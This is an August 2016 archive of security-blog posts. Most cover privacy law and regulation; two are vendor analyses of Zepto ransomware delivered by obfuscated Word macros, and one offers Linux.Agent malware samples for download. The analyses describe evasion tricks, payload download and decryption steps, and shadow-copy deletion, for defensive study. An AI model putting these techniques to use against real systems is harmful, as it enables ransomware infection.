Monthly Archives: August 2016

Enterprise Security Weekly #13 – To MSSP or not to MSSP

Threat Intelligence gets funding, Security products in the cloud, incorporating virus totaling in your products, two factor authentication for voice-over IP. To MSSP or not to MSSP is the question. All that and more on Enterprise Security Weekly! 

Full Show Notes:

Visit for all the latest episodes!

WhatsApp Updates Privacy Policy to Share Information with Facebook

On August 25, 2016, WhatsApp announced in a blog post that the popular mobile messaging platform updated its Terms of Service and Privacy Policy to permit certain information sharing with Facebook. After Facebook acquired WhatsApp in 2014, the Director of the FTC’s Bureau of Consumer Protection wrote a letter to both Facebook and WhatsApp that discussed the companies’ obligations to honor privacy statements made to consumers in connection with the acquisition.

WhatsApp has developed FAQs that discuss the changes to the Terms of Service and Privacy Policy. In addition to describing new product features, such as WhatsApp Calling, the FAQs describe the new information sharing with Facebook. WhatsApp will begin to share users’ phone numbers that are registered with WhatsApp, as well as the last time that individuals used the service. According to the update, WhatsApp will not disclose the content of any messages or photos sent via WhatsApp to Facebook.

The information disclosed to Facebook will be used for several purposes. These include enabling WhatsApp and Facebook to (1) more accurately count users, (2) fight spam and abuse, and (3) improve user experiences across WhatsApp and Facebook services, such as providing better friend suggestions and more relevant ads on Facebook. WhatsApp will provide its users with the ability to opt out from sharing information with Facebook for the purpose of improving Facebook ads and product experiences.

Zepto Evasion Techniques

We’ve been tracking some more spam dropping Zepto ransomware variants. Like earlier posts, we’re seeing infected attachments with malicious macro scripts used as the entry point for the threat actor. (See images below of some recent spam samples.)

Zepto spam

As we dig deeper into our analysis, we found out that these macro scripts are not crafted manually. The malware authors have automated the creation and obfuscation of their code. This type of random obfuscation is one way of evading antivirus engines. As outlined below, our research highlights several methods employed to dynamically evolve the attack vector to circumvent detection.

From the malicious emails we have gathered, we will examine the attachments to analyze key differences and common characteristics.

The malicious code was written and spread across the 3 sub modules:

zepto automation

5 sub modules are being used for the malicious code:

zepto obfuscation

Examining the sub modules of the file shows that it has some common signatures that we can look for:

zepto codezepto hidden code

We were able to find blocks of code that shares common structures. Remember that these codes were found on a different part or index of the module. From programmer’s perspective, this may seem a little odd to see codes like this, but as the analysis continues, we can say that this is just one part of the malware author’s strategy to hide the code and confuse incident responders.

Notice the highlighted strings from both screenshots that are common across the two samples. At first glance, some significant strings can be formed only if the garbage strings such as:

  • “RIIM”
  • “PORKKI”

were removed or replaced, they can be formed as:

  • “microsoft”
  • “”
  • “script”
  • “application”

Additionally, and maybe more significant, is the activity of these scripts. You will also notice the highlighted strings are surrounded by what we can now assume are garbage code for misdirection and to further obfuscate malicious code.

Basically, the usual flow of the scripts analyzed will go like this:

zepto infection process

At this point, the payload of the downloaded Zepto ransomware will take over.

As observed with the Zepto downloaders, the scripts also varies with the encrypted URLs. Below are some of the URLs from which the monitored scripts attempted to download Zepto. Imagine how many of them are generated and how many various structured scripts are available in the wild. Zepto is not only distributed through macro scripts, there are also JavaScrip and wsf script downloaders.

zepto download links

With some twists of social engineering, creativity and advanced programming skills, cybercriminals are becoming increasingly adept at delivering Zepto and other ransomware payloads to both business and home users.

zepto infection screen

Prevent Ransomware Infections?

To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data

VIPRE Antivirus Detections for this threat include:

  • (v)
  • Trojan-Downloader.O97M.Donoff.bu (v)
  • OLE.Generic.a (v)



Zepto Ransomware Packed into WSF Spam

Analysis by Daryl Tupaz

The post Zepto Evasion Techniques appeared first on ThreatTrack Security Labs Blog.

Lisa Sotto Speaks on Cybersecurity: Evolution of the Practice (Part 2)

As we previously reported, Lisa J. Sotto, partner and head of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice group, spoke at Bloomberg Law’s Second Annual Big Law Business Summit on changes in the privacy and security legal landscape. In Part 2 of her discussion, Lisa speaks about the evolution of privacy laws over the years. The “hundreds of [privacy laws] at the federal and state level,” as well as data protection laws in countries all over the world, is a far cry from the landscape in 1999 when Lisa started the privacy practice at Hunton & Williams. To keep up with the evolution of data privacy, lawyers and regulators alike must understand that its “a 24/7 endeavor,” and one that is global in nature. “Data is not constrained by state or country boundaries,” says Sotto.

View the second segment.

Linux.Agent malware sample – data stealer

Research: SentinelOne, Tim Strazzere Hiding in plain sight?
Sample credit: Tim Strazzere

List of files

9f7ead4a7e9412225be540c30e04bf98dbd69f62b8910877f0f33057ca153b65  malware
d507119f6684c2d978129542f632346774fa2e96cf76fa77f377d130463e9c2c  malware
fddb36800fbd0a9c9bfffb22ce7eacbccecd1c26b0d3fb3560da5e9ed97ec14c  script.decompiled-pretty
ec5d4f90c91273b3794814be6b6257523d5300c28a492093e4fa1743291858dc  script.decompiled-raw
4d46893167464852455fce9829d4f9fcf3cce171c6f1a9c70ee133f225444d37  script.dumped

malware fcbfb234b912c84e052a4a393c516c78
script.decompiled-pretty aab8ea012eafddabcdeee115ecc0e9b5
script.decompiled-raw ae0ea319de60dae6d3e0e58265e0cfcc
script.dumped b30df2e63bd4f35a32f9ea9b23a6f9e7


Download. Email me if you need the password

China Enacts E-Hailing Regulation to Protect Driver and Passenger Data

Last month, the People’s Republic of China’s Ministry of Transportation, Ministry of Industry and Information Technology and six other administrative departments jointly published the Interim Measures for the Administration of Operation and Services of E-hailing Taxis (the “Measures”). E-hailing is an increasingly popular business in China and has already become a compelling alternative to the traditional taxi. The Measures seek to regulate this emerging industry, and will come into effect on November 1, 2016. Below is a summary of the key requirements.

The Measures contain a data localization requirement under which operators of e-hailing platforms will be required to locate their servers within mainland China. In addition, personal information collected on e-hailing platforms and business data generated during their operations must be stored and used within mainland China, and such information and data must be retained for at least two years.

The Measures also require operators of e-hailing platforms to expressly disclose the purpose, method and scope of the collection and use of the personal information of drivers and passengers while on the platforms. Operators of e-hailing platforms will be required to follow the principle of necessity when they collect personal information of drivers and passengers and may not use such personal information for other businesses without the consent of the data subjects.

Under the Measures, operators of e-hailing platforms must not, except for purposes of cooperating with supervisory authorities or with criminal investigations, provide the personal information of drivers and passengers (such as names, contact information, home addresses, bank or payment accounts, geographical location or travel routes) to any third parties. They are also prohibited from disclosing sensitive information relating to national security, such as geographical coordinates and symbols.

The Measures also require operators of e-hailing platforms to adopt systems for the administration of cybersecurity and technical security measures. In the event of an information leakage, operators of e-hailing platforms must report to the relevant competent authority without delay and take timely and effective remedial measures.

E-hailing platform operators that illegally use or disclose passengers’ personal information may face a penalty of RMB 2,000 to RMB 10,000. They may also be subject to civil liability for compensation and criminal sanctions.

OMB Updates Federal Information Management Policies

The Office of Management and Budget (“OMB”) recently issued updates to Circular A-130 covering the management of federal information resources. OMB revised Circular A-130 “to reflect changes in law and advances in technology, as well as to ensure consistency with Executive Orders, Presidential Directives, and other OMB policy.” The revised policies are intended to transform how privacy is addressed across the branches of the federal government.

In its press release announcing the revised document, OMB noted that “as government continues to digitize, we must ensure we manage data not only to keep it secure, but also [to] allow us to harness this information to provide the best possible service to our citizens.” Thus, according to OMB, the updated Circular A-130 combines in one document “a wide range of policy updates for federal agencies” on issues relating to “cybersecurity, information governance, privacy, records management, open data, and acquisitions.” It also covers issues relating to IT planning and budgeting.

Specifically, Circular A-130 focuses on the following three elements “to help spur innovation throughout the government”:

  • Real Time Knowledge of the Environment: Replacing periodic compliance-driven assessments with ongoing monitoring of federal information resources.
  • Proactive Risk Management: Focusing on modernizing the way in which the government identifies, categorizes and handles privacy and security risks.
  • Shared Responsibility: Focusing on shared responsibility and accountability for privacy and security among managers, employees and citizens.

According to OMB, the revised Circular A-130 “represents a shift from viewing security and privacy requirements as compliance exercises to understanding security and privacy as crucial components of a comprehensive, strategic, and continuous risk-based program.”

The fact sheet released with the press release indicates that the updated Circular A-130 “promotes innovation, enables information sharing, and fosters the wide-scale and rapid adoption of new technologies while protecting and enhancing security and privacy.”

Circular A-130 has two appendixes: Appendix I is titled Responsibilities for Protecting and Managing Federal Information Resources and Appendix II is titled Responsibilities for Managing Personally Identifiable Information (PII).

Appendix II, which is completely new, focuses on agency responsibilities for managing PII, applying the fair information practice principles, conducting privacy impact assessments, maintaining an inventory of PII, privacy training, privacy contracting and applying the NIST Risk Management Framework to manage privacy risks in the context of agency privacy programs.

Donoff Macro Dropping Ransomware

Recently, we’ve spotted Zepto ransomware spreading through spam email containing fake invoices (see image below). These attachments contain a Macro-Enabled word document file known as Donoff, which downloads the Zepto executable that encrypts all your files and will later ask for payment of the decryption key.

donoff malicious macro sample

We decided to take a closer look on the Donoff macro used in downloading the Zepto ransomware. Here’s what we found:

The VBA Macro code

At first glance, the code is fully commented in Spanish and uses some random generated variable names.

Here a look at the code:

donoff macro code

Retrieving Zepto

The Word document contains two macro functions, autoopen and ActualizarEntrada.

donoff spanish code

Here are more snips of code showing the processing of obfuscated text.

donoff macro code

These are the strings revealed after deobfuscation.

  • streaM
  • Application
  • shell
  • Process
  • GeT
  • TeMP
  • Type
  • open
  • write
  • responseBody
  • savetofile
  • \sysdrubpas.exe

This VBScript uses Microsoft.XMLHTTP and Adodb.Stream Objects to download Zepto.

The Microsoft.XMLHTTP object is one of Microsoft’s XML DOM (Document Object Model) modules that is intended to deliver client-side access to XML documents on remote servers through the HTTP protocol.  This object is used to request or send any type of document.

The ADODB.Stream Object is used to read, write and manage a stream of binary data or text.


The following code decrypts to



Here’s the code that downloads the encrypted Zepto executable file.


The encrypted file is stored to the file system as TempWFDSAdrweg.  It then uses this key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym to decrypt and stores the decrypted binary to the file sysdrubpas.exe in the %temp% folder.  %temp% folder is usually the C:\Users\<username>\AppData\Local\Temp folder.


Decryption code


Encrypted Zepto (Displayed here in Hexadecimals):

encrypted zepto

Decrypted Zepto (now in Executable form):

decrypted zepto

The script then executes sysdrubpas.exe infecting the system of the user.


ThreatAnalyzer – Malware Sandbox Analysis

When executed in our malware analysis sandbox ThreatAnalyzer, here’s the process tree caused by the malicious Word document

donoff analysis

The ThreatAnalyzer Behavioral Determination Engine flags this as 100% malicious file and was able to find dozens of suspicious behaviors.donoff processes

One notable common behavior of ransomware is how it deletes shadow copies to prevent easy restoration from Windows backup.


Other behaviors are very similar to our previous post about Zepto ransomware:

Prevent Ransomware Infections?

To prevent ransomware, we recommended you block it early from the root of its infection chain. Here are some tips:

  • Always keep your operating system, applications and security products patched and up to date
  • Take precaution when opening attachments, especially when sent by an unknown sender
  • Never enable VBA macros by default for any Microsoft Office application. Some macro malwares even tell you how to enable macros or may mislead you in doing so.
  • Deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure
  • Regularly back up your data


e98aee56175daaa96f259d04077d820f – malicious DOC attachment ( (v))

837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)

Analysis by Wilmina Elizon

The post Donoff Macro Dropping Ransomware appeared first on ThreatTrack Security Labs Blog.

Hack Naked TV – August 18, 2016

Well the “shortage” of IT and InfoSec Professionals made have just been solved by Cisco. Yesterday Cisco announce it is planning to cut 5,500 jobs from its workforce. The layoffs will supposedly allow the company to invest in key priorities such as security, IoT, collaboration, next generation data center and cloud.

Visit to get all the latest episodes!

China Publishes Regulation on the Use of Resident Identity Cards

Recently, the People’s Republic of China’s Ministry of Public Security, the National Development and Reform Commission and six other administrative departments jointly published the Announcement on Regulating the Administration of the Use of Resident Identity Cards (the “Announcement”). The Announcement came into effect on July 15, 2016, the date of its issuance.

The Announcement reiterates existing prohibitions against leasing, lending or assigning a resident identity card to another person, and reiterates an existing requirement that resident identity cards must not be seized or held as a security by government agencies, related entities or their staff.

According to the Announcement, when performing their duties or providing services, personnel of government agencies and related entities must not arbitrarily record the personal information of citizens that appears on their resident identity cards. Additionally, government agencies, related entities or their personnel cannot arbitrarily copy or scan identity cards of residents. The Announcement encourages citizens to resist unauthorized copying, scanning or seizure of their resident identity cards.

Government agencies and related entities are required to establish administrative systems for the security of personal information and develop those systems to their fullest extent, adopt internal storage systems for personal information that use strict access authorization procedures and strengthen their security measures to avoid the leakage or theft of information.

Government agencies and related entities are also required to establish a “blacklist” of individuals having a history of using the resident identity cards of other persons as their own, and to adopt information sharing mechanisms.

Lisa Sotto Speaks on Cybersecurity: Changes in Legal Landscape (Part 1)

Lisa J. Sotto, partner and head of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice group, recently spoke at Bloomberg Law’s Second Annual Big Law Business Summit. In Part 1 of the panel discussion, Lisa describes the dramatic changes in the legal landscape of privacy over the last 10 to 15 years, discussing the emergence of privacy laws such as “the Gramm-Leach-Bliley Act for the financial sector, HIPAA for the health care sector and…of course, the local implementation of the European Data Protection Directive.” She then continues to note an “explosion” in the legal landscape in 2005 due to the first data breach that drew national attention, after which, “cyber and privacy grew in parallel.”

View this first segment.

AIG Launches Cyber-BI and PD Policy

As reported in the Hunton Insurance Recovery Blog, insurance-giant American International Group (“AIG”) announced that it will be the first insurer to offer standalone primary coverage for property damage, bodily injury, business interruption and product liability that results from cyber attacks and other cyber-related risks. According to AIG, “Cyber is a peril [that] can no longer be considered a risk covered by traditional network security insurance product[s].” The new AIG product, known as CyberEdge Plus, is intended to offer broader and clearer coverage for harms that had previously raised issues with insurers over the scope of available coverage. AIG explains its new coverage as follow:

“CyberEdge can provide companies with protection against the following:

  • Third-party claims arising from a failure of the insured’s network security or a failure to protect data. Insurance also responds to regulatory actions in connection with a security failure, privacy breach, or the failure to disclose a security failure or privacy breach.
  • Direct first-party costs of responding to a security failure or privacy breach by paying costs of notifications, public relations, and other services to assist in managing and mitigating a cyber incident. Forensic investigations, legal consultations, and identity monitoring costs for victims of a breach are all covered.
  • Business interruption caused by a network security failure by reimbursing for resulting lost income and operating expenses.
  • Threats made against a company’s computer network and confidential information by an outsider attempting to extort money, securities, or other valuables. Coverage includes monies paid to end the threat and the cost of an investigation to determine the cause of the threat.
  • Liability faced by companies for content distributed on their website. Coverage is provided for numerous media perils including copyright infringement, trademark infringement, defamation, and invasion of privacy.”

AIG is offering its new coverage with limits of up to $100 million.


Here is my opinion on FPC. 

Full packet capture can be an intrusion analyst's best friend. Consider this example: You receive an alert that an internal device accessed a piece of JavaScript on some web site and the rule says there was an object use-after-free attempt. You need to inspect that code and see if it is malicious and preferably, what occurred afterwards. 

You could use a tool like wget or Spondulas to download the code, or you could use a sand boxed machine to browse to the URI and view the source. You could put the URI into some online site checker and see what it finds. You could check the reputation of the domain.

But, what if you are capturing full packets going in and out of your network to the Internet?

You can pull up the URI in a tool like Moloch or a commercial tool, and look at the session. You can see the JavaScript as it was delivered exactly to THAT client, running that OS, using that browser and user-agent and see what happened afterwards. You can save the code off as a file to further inspect it and run the pcap through Wireshark or SteelCentral Packet Analyzer or Netwitness or some other analysis tool.

You CAN do intrusion analysis without FPC, but you can't do it as quickly OR as effectively. 
Flow data and logs and threat intelligence are all fine (well, maybe not so much on the threat intelligence) but having packets trumps them all.

OCR Settles Largest HIPAA Violation Against a Single Covered Entity

On August 4, 2016, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) entered into a resolution agreement with Advocate Health Care Network (“Advocate”), the largest health care system in Illinois, over alleged HIPAA violations. The $5.5 million settlement with Advocate is the largest settlement to date against a single covered entity.

Following the submission of three breach notification reports by Advocate in 2013 that affected approximately 4 million individuals, OCR investigated Advocate and found it had failed to (1) conduct an accurate and thorough risk assessment, (2) limit physical access to its data center that contained electronic protected health information (“ePHI”), (3) obtain satisfactory assurances from its business associate that it would adequately safeguard ePHI, and (4) reasonably safeguard ePHI by leaving an unencrypted laptop containing ePHI in an unlocked vehicle overnight.

The resolution agreement requires Advocate to pay $5.5 million to OCR and enter into a Corrective Action Plan that obligates Advocate to:

  • modify its existing risk analysis to include a completely inventory of all Advocate facilities, equipment, systems and applications that contain or store ePHI;
  • develop and implement a comprehensive risk management plan to address those risks and vulnerabilities identified in the risk analysis;
  • implement a process for evaluating environmental or operational changes that affect the security of Advocate’s ePHI;
  • develop an encryption report that explains why any Advocate device and equipment are not encrypted;
  • review and revise its policies and procedures on device and media controls, facility access controls and business associates;
  • enhance its existing security awareness training program;
  • submit an Internal Monitoring Plan to OCR;
  • report any events of noncompliance with its HIPAA policies and procedures; and
  • submit a detailed Implementation Report to OCR within 120 days after its approval of its risk management plan, as well as annual compliance reports for a period of two years.

In announcing the settlement with Advocate, OCR Director Jocelyn Samuels noted that “[w]e hope this settlement sends a strong message to covered entities that they must engage in a comprehensive risk analysis and risk management to ensure that individuals’ ePHI is secure.” Director Samuels further emphasized reducing the “risks to ePHI in all physical locations and on all portable devices to a reasonable and appropriate level.”

The large monetary settlement with Advocate resulted from several factors, including (1) the extent and duration of Advocate’s noncompliance with the HIPAA rules; (2) the involvement of the Illinois Attorney General in a parallel investigation of Advocate, and (3) the large number of individuals affected by the Advocate breaches.

China’s State Administration for Industry and Commerce Publishes Draft Regulations on the Protection of Consumer Rights

The State Administration for Industry and Commerce of the People’s Republic of China published a draft of its Implementing Regulations for the P.R.C. Law on the Protection of the Rights and Interests of Consumers (the “Draft”) for public comment. The draft is open for comment until September 5, 2016.

The Draft reiterates the requirements under the law that business operators must follow the principles of legitimacy, rightfulness and necessity when they collect and use the personal information of consumers. They also must expressly state the purposes, methods and scope of their collection and use of the information, and obtain the consent of the consumers. It also provides that business operators may not collect information that is irrelevant to their operations, or collect information in an improper way. Under the Draft, a business operator is required to retain, for at least five years, supporting documentation that can demonstrate its performance of its obligation to expressly inform and obtain the consent of consumers.

Business operators are required to adopt information security systems to ensure the security of the personal information of consumers. Business operators are required not to provide consumers’ personal information to other parties without the consumers’ consent, except in cases where the consumers’ personal information is anonymized in such a way that it cannot identify the specific individual and that the anonymization cannot be reversed.

In the event that a business operator suffers an information security breach which results in the disclosure or loss of information, or anticipates that such a breach is likely, the business operator is required to adopt remedial measures and promptly inform the affected consumers of such breach.

Compared with the original definition of “consumers’ personal information” in the earlier Measures for the Punishment of Conduct Infringing the Rights and Interests of Consumers, the scope of the term “consumers’ personal information” under the Draft additionally includes biometric features.

According to the Draft, without consumers’ express consent or request, business operators may not send them commercial electronic messages or make commercial marketing calls. Business operators also may not cause consumers to bear the costs of sending commercial electronic messages or making commercial marketing calls, unless otherwise agreed by the parties.

FTC Reverses ALJ Decision, Finds LabMD Liable for Unfair Data Security Practices

On July 29, 2016, the Federal Trade Commission (“FTC”) announced that it had issued an opinion and final order concluding that LabMD, Inc. (“LabMD”) violated the unfairness prong of Section 5 of the FTC Act by failing to maintain reasonable security practices to protect consumers’ sensitive personal information. The unanimous decision reverses a November 2015 administrative law judge’s initial decision that, as we previously reported, dismissed the FTC’s charges against LabMD for failing to show that LabMD’s allegedly unreasonable data security practices caused, or were likely to cause, substantial consumer injury.

The case stems from allegations that LabMD, a now-defunct clinical laboratory for physicians, failed to protect the sensitive personal information (including medical information) of consumers, resulting in two specific security incidents. One such incident occurred when a third party informed LabMD that an insurance-related report, which contained personal information of approximately 9,300 LabMD clients (including names, dates of birth and Social Security numbers), was available on a peer-to-peer (“P2P”) file-sharing network.

In its ruling, the FTC stated that the administrative law judge used the wrong legal standard for the unfairness prong, and stated that LabMD’s security practices were unreasonable, among other failings, because the company “failed to use an intrusion detection system or file integrity monitoring, neglected to monitor traffic coming across its firewalls, provided essentially no data security training to its employees, and never deleted any of the consumer data it had collected.”

The order requires LabMD to establish a comprehensive information security program, obtain periodic third-party assessments of its security program and notify consumers whose personal information was exposed on the P2P network. LabMD has 60 days to appeal.